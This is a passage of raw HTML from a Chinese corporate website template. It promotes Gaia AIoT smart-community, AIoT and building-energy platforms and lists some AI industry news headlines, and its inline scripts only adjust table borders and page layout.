ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_31_0" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 1198px; left: 1px; top: 350px;z-index:9;"><div class="yibuFrameContent con_132_2 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_132_2"> <div id="smv_con_40_41" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Left","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_132_2" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 300px; left: 0px; top: 0px;z-index:7;"><div class="yibuFrameContent con_40_41 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_40_41"> <div id="smv_con_51_49" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_40_41" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 43px; width: 233px; left: 34px; top: 75px;z-index:2;"><div class="yibuFrameContent con_51_49 text_Style1 " style="overflow:hidden;;"><div id='txt_con_51_49' style="height: 100%;"> <div class="editableContent" id="txtc_con_51_49" style="height: 100%; word-wrap:break-word;"> <p><span style="color:#856dcc"><strong><span style="font-size:24px"><span style="font-family:Source Han Sans,Geneva,sans-serif">智能社区平台</span></span></strong></span></p> </div> </div> <script> var tables = $(' #smv_con_51_49').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_52_48" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_40_41" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 18px; width: 233px; left: 34px; top: 54px;z-index:3;"><div class="yibuFrameContent con_52_48 text_Style1 " style="overflow:hidden;;"><div id='txt_con_52_48' style="height: 100%;"> <div class="editableContent" id="txtc_con_52_48" style="height: 100%; word-wrap:break-word;"> <p><span style="letter-spacing:1px"><span style="font-size:14px"><span style="color:#777777"><span style="font-family:Arial,Helvetica,sans-serif">Gaia AIoT Community</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_52_48').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_53_58" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_40_41" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 68px; width: 232px; left: 34px; top: 124px;z-index:4;"><div class="yibuFrameContent con_53_58 text_Style1 " style="overflow:hidden;;"><div id='txt_con_53_58' style="height: 100%;"> <div class="editableContent" id="txtc_con_53_58" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="line-height:1.75"><span style="color:#666666"><span style="font-size:12px">主要应用于智慧社区的实战指挥平台,终提高管理、服务决策的智能化水平</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_53_58').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_54_19" ctype="button" class="esmartMargin smartAbs " cpid="30536" cstyle="Style9" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_40_41" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 37px; width: 37px; left: 257px; top: 206px;z-index:5;"><div class="yibuFrameContent con_54_19 button_Style9 " style="overflow:visible;;"><!-- 类 --> <!-- w-button-isi + (w-isi-top w-isi-bottom w-isi-left w-isi-right) --> <!-- w-button-wayra + (w-wayra-topLeft w-wayra-topRight w-wayra-bottomLeft w-wayra-bottomRight) --> <script type="text/javascript"> $(function () { }); </script> </div></div> </div> </div></div></div><div id="smv_con_41_28" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Down","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_132_2" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 300px; left: 300px; top: 0px;z-index:7;"><div class="yibuFrameContent con_41_28 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_41_28"> <div id="smv_con_55_50" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_41_28" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 43px; width: 233px; left: 34px; top: 74px;z-index:2;"><div class="yibuFrameContent con_55_50 text_Style1 " style="overflow:hidden;;"><div id='txt_con_55_50' style="height: 100%;"> <div class="editableContent" id="txtc_con_55_50" style="height: 100%; word-wrap:break-word;"> <p><span style="color:#ffffff"><strong><span style="font-size:24px"><span style="font-family:Source Han Sans,Geneva,sans-serif">智能社区平台</span></span></strong></span></p> </div> </div> <script> var tables = $(' #smv_con_55_50').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_56_50" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_41_28" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 18px; width: 233px; left: 34px; top: 53px;z-index:3;"><div class="yibuFrameContent con_56_50 text_Style1 " style="overflow:hidden;;"><div id='txt_con_56_50' style="height: 100%;"> <div class="editableContent" id="txtc_con_56_50" style="height: 100%; word-wrap:break-word;"> <p><span style="color:#eeeeee"><span style="font-size:14px"><span style="font-family:Arial,Helvetica,sans-serif">Gaia AIoT Community</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_56_50').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_57_50" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_41_28" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 68px; width: 232px; left: 34px; top: 123px;z-index:4;"><div class="yibuFrameContent con_57_50 text_Style1 " style="overflow:hidden;;"><div id='txt_con_57_50' style="height: 100%;"> <div class="editableContent" id="txtc_con_57_50" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="color:#ffffff"><span style="line-height:1.75"><span style="font-size:12px">主要应用于智慧社区的实战指挥平台,终提高管理、服务决策的智能化水平</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_57_50').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_58_54" ctype="button" class="esmartMargin smartAbs " cpid="30536" cstyle="Style9" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_41_28" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 38px; width: 38px; left: 257px; top: 206px;z-index:5;"><div class="yibuFrameContent con_58_54 button_Style9 " style="overflow:visible;;"><!-- 类 --> <!-- w-button-isi + (w-isi-top w-isi-bottom w-isi-left w-isi-right) --> <!-- w-button-wayra + (w-wayra-topLeft w-wayra-topRight w-wayra-bottomLeft w-wayra-bottomRight) --> <script type="text/javascript"> $(function () { }); </script> </div></div> </div> </div></div></div> </div> </div></div></div><div id="smv_con_131_39" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_31_0" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 1200px; left: 0px; top: 600px;z-index:8;"><div class="yibuFrameContent con_131_39 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_131_39"> <div id="smv_con_42_40" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Left","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_131_39" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 300px; left: 0px; top: 0px;z-index:7;"><div class="yibuFrameContent con_42_40 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_42_40"> <div id="smv_con_46_44" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_42_40" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 61px; width: 260px; left: 20px; top: 122px;z-index:2;"><div class="yibuFrameContent con_46_44 text_Style1 " style="overflow:hidden;;"><div id='txt_con_46_44' style="height: 100%;"> <div class="editableContent" id="txtc_con_46_44" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><strong><span style="font-size:28px"><span style="color:#ffffff">AIOT 平台</span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_46_44').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_47_31" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_42_40" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 18px; width: 208px; left: 46px; top: 97px;z-index:3;"><div class="yibuFrameContent con_47_31 text_Style1 " style="overflow:hidden;;"><div id='txt_con_47_31' style="height: 100%;"> <div class="editableContent" id="txtc_con_47_31" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="letter-spacing:1px"><span style="color:#cccccc"><span style="font-family:Arial,Helvetica,sans-serif"><span style="font-size:14px">AIOT PLATFORM</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_47_31').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div><div id="smv_con_43_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_131_39" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 600px; left: 300px; top: 0px;z-index:7;"><div class="yibuFrameContent con_43_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_43_22"> <div id="smv_con_48_15" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_43_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 41px; width: 252px; left: 42px; top: 89px;z-index:2;"><div class="yibuFrameContent con_48_15 text_Style1 " style="overflow:hidden;;"><div id='txt_con_48_15' style="height: 100%;"> <div class="editableContent" id="txtc_con_48_15" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="color:#ffffff"><span style="font-size:28px"><span style="font-family:Source Han Sans,Geneva,sans-serif">智能建筑能源平台</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_48_15').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_49_4" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_43_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 21px; width: 360px; left: 44px; top: 63px;z-index:3;"><div class="yibuFrameContent con_49_4 text_Style1 " style="overflow:hidden;;"><div id='txt_con_49_4' style="height: 100%;"> <div class="editableContent" id="txtc_con_49_4" style="height: 100%; word-wrap:break-word;"> <p><span style="letter-spacing:6px"><span style="color:#ffffff"><span style="font-size:16px"><span style="font-family:Arial,Helvetica,sans-serif">Gaia AIoT ABAS</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_49_4').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_50_5" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_43_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 73px; width: 195px; left: 46px; top: 144px;z-index:4;"><div class="yibuFrameContent con_50_5 text_Style1 " style="overflow:hidden;;"><div id='txt_con_50_5' style="height: 100%;"> <div class="editableContent" id="txtc_con_50_5" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="color:#ffffff"><span style="font-size:12px"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">针对城市、园区、建筑等提供涵盖管廊、消防、能源、环保等方面的全生命周期服务</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_50_5').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_59_59" ctype="button" class="esmartMargin smartAbs " cpid="30536" cstyle="Style9" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_43_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 38px; width: 38px; left: 555px; top: 204px;z-index:5;"><div class="yibuFrameContent con_59_59 button_Style9 " style="overflow:visible;;"><!-- 类 --> <!-- w-button-isi + (w-isi-top w-isi-bottom w-isi-left w-isi-right) --> <!-- w-button-wayra + (w-wayra-topLeft w-wayra-topRight w-wayra-bottomLeft w-wayra-bottomRight) --> <script type="text/javascript"> $(function () { }); </script> </div></div> </div> </div></div></div><div id="smv_con_45_53" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Right","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_131_39" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 250px; width: 300px; left: 900px; top: 0px;z-index:7;"><div class="yibuFrameContent con_45_53 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_45_53"> <div id="smv_con_60_55" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_45_53" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 90px; width: 215px; left: 42px; top: 65px;z-index:2;"><div class="yibuFrameContent con_60_55 text_Style1 " style="overflow:hidden;;"><div id='txt_con_60_55' style="height: 100%;"> <div class="editableContent" id="txtc_con_60_55" style="height: 100%; word-wrap:break-word;"> <p><span style="line-height:1.75"><span style="color:#333333"><strong><span style="font-size:24px"><span style="font-family:Source Han Sans,Geneva,sans-serif">了解详情</span></span></strong></span></span></p> <p> </p> <p><span style="line-height:1.75"><span style="font-size:12px"><span style="color:#666666"><span style="font-family:Source Han Sans,Geneva,sans-serif">获取详细内容,了解更多我们的服务</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_60_55').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_61_14" ctype="button" class="esmartMargin smartAbs " cpid="30536" cstyle="Style9" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_45_53" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 38px; width: 38px; left: 257px; top: 206px;z-index:5;"><div class="yibuFrameContent con_61_14 button_Style9 " style="overflow:visible;;"><!-- 类 --> <!-- w-button-isi + (w-isi-top w-isi-bottom w-isi-left w-isi-right) --> <!-- w-button-wayra + (w-wayra-topLeft w-wayra-topRight w-wayra-bottomLeft w-wayra-bottomRight) --> <script type="text/javascript"> $(function () { }); </script> </div></div> </div> </div></div></div> </div> </div></div></div> </div> <div class="w-banner-color fullcolumn-outer" id="bannerWrap_con_31_0"> <div class="w-banner-image"></div> </div> </div> <script type="text/javascript"> $(function () { var resize = function () { $("#smv_con_31_0 >.yibuFrameContent>.w-banner>.fullcolumn-inner").width($("#smv_con_31_0").parent().width()); $('#bannerWrap_con_31_0').fullScreen(function (t) { if (VisitFromMobile()) { t.css("min-width", t.parent().width()); } $("#bannerWrap_con_31_0 > .w-banner-image").lzparallax({ effect:'fixed' ,autoPosition:false}); }); } if (typeof (LayoutConverter) !== "undefined") { LayoutConverter.CtrlJsVariableList.push({ CtrlId: "con_31_0", ResizeFunc: resize, }); } else { $(window).resize(function (e) { if (e.target == this) { resize(); } }); } resize(); }); </script> </div></div><div id="smv_con_104_50" ctype="banner" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="" iscontainer="True" pvid="" tareaid="" re-direction="y" daxis="Y" isdeletable="True" style="height: 584px; width: 100%; left: 0px; top: 3085px;z-index:12;"><div class="yibuFrameContent con_104_50 banner_Style1 " style="overflow:visible;;"><div class="fullcolumn-inner smAreaC" id="smc_Area0" cid="con_104_50" style="width:1200px"> <div id="smv_con_211_39" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_104_50" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 422px; width: 768px; left: 10px; top: 88px;z-index:7;"><div class="yibuFrameContent con_211_39 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_211_39"> <div id="smv_con_105_25" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Left","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_211_39" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 48px; width: 155px; left: 0px; top: 0px;z-index:3;"><div class="yibuFrameContent con_105_25 text_Style1 " style="overflow:hidden;;"><div id='txt_con_105_25' style="height: 100%;"> </div> <script> var tables = $(' #smv_con_105_25').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_106_39" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Left","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_211_39" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 46px; width: 533px; left: 163px; top: 2px;z-index:2;"><div class="yibuFrameContent con_106_39 text_Style1 " style="overflow:hidden;;"><div id='txt_con_106_39' style="height: 100%;"> <div class="editableContent" id="txtc_con_106_39" style="height: 100%; word-wrap:break-word;"> <p><span style="color:#cccccc"><span style="font-size:38px"><strong><span style="font-family:Arial Black">Industry Dynamic.</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_106_39').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_107_46" ctype="line" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_211_39" tareaid="" re-direction="x" daxis="All" isdeletable="True" style="height: 20px; width: 766px; left: 1px; top: 51px;z-index:4;"><div class="yibuFrameContent con_107_46 line_Style1 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; height:100%"> <div class="w-line" style="position:absolute;top:50%;" linetype="horizontal"></div> </div> </div></div><div id="smv_con_108_28" ctype="listnews" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_211_39" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 333px; width: 767px; left: 0px; top: 89px;z-index:5;"><div class="yibuFrameContent con_108_28 listnews_Style1 " style="overflow:visible;;"> <ul class="w-list xn-resize " id="ulList_con_108_28"> <li class="w-list-item"> <span class="w-list-date">2022-01-10</span> <div class="w-list-inner f-clearfix"> <i class="w-list-icon mw-iconfont">넷</i> <a href="#" target="_self" class="w-list-link">下一站AI:实时服务</a> </div> </li> <li class="w-list-item"> <span class="w-list-date">2022-01-10</span> <div class="w-list-inner f-clearfix"> <i class="w-list-icon mw-iconfont">넷</i> <a href="#" target="_self" class="w-list-link">自我监督学习:AI技术的未来发展方向</a> </div> </li> <li class="w-list-item"> <span class="w-list-date">2022-01-10</span> <div class="w-list-inner f-clearfix"> <i class="w-list-icon mw-iconfont">넷</i> <a href="#" target="_self" class="w-list-link">人工智能正在推动芯片的复兴</a> </div> </li> <li class="w-list-item"> <span class="w-list-date">2022-01-10</span> <div class="w-list-inner f-clearfix"> <i class="w-list-icon mw-iconfont">넷</i> <a href="#" target="_self" class="w-list-link">如何构建全场景智慧生活?</a> </div> </li> <li class="w-list-item"> <span class="w-list-date">2022-01-10</span> <div class="w-list-inner f-clearfix"> <i class="w-list-icon mw-iconfont">넷</i> <a href="#" target="_self" class="w-list-link">供应链为什么要引入区块链?</a> </div> </li> <li class="w-list-item"> <span class="w-list-date">2022-01-10</span> <div class="w-list-inner f-clearfix"> <i class="w-list-icon mw-iconfont">넷</i> <a href="#" target="_self" class="w-list-link">人工智能将“吞噬“数据</a> </div> </li> </ul> </div></div> </div> </div></div></div><div id="smv_con_109_46" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Right","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_104_50" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 339px; width: 351px; left: 848px; top: 147px;z-index:6;"><div class="yibuFrameContent con_109_46 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_109_46"> <div id="smv_con_110_34" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item1" areaid="Area0" iscontainer="False" pvid="con_109_46" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 66px; width: 292px; left: 29px; top: 37px;z-index:2;"><div class="yibuFrameContent con_110_34 text_Style1 " style="overflow:hidden;;"><div id='txt_con_110_34' style="height: 100%;"> <div class="editableContent" id="txtc_con_110_34" style="height: 100%; word-wrap:break-word;"> <p><span style="line-height:1.5"><span style="color:#ffffff"><span style="font-size:18px">自我监督学习:</span></span></span></p> <p><span style="line-height:1.5"><strong><span style="font-size:24px"><span style="color:#ffffff">AI技术的未来发展方向</span></span></strong></span></p> </div> </div> <script> var tables = $(' #smv_con_110_34').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') 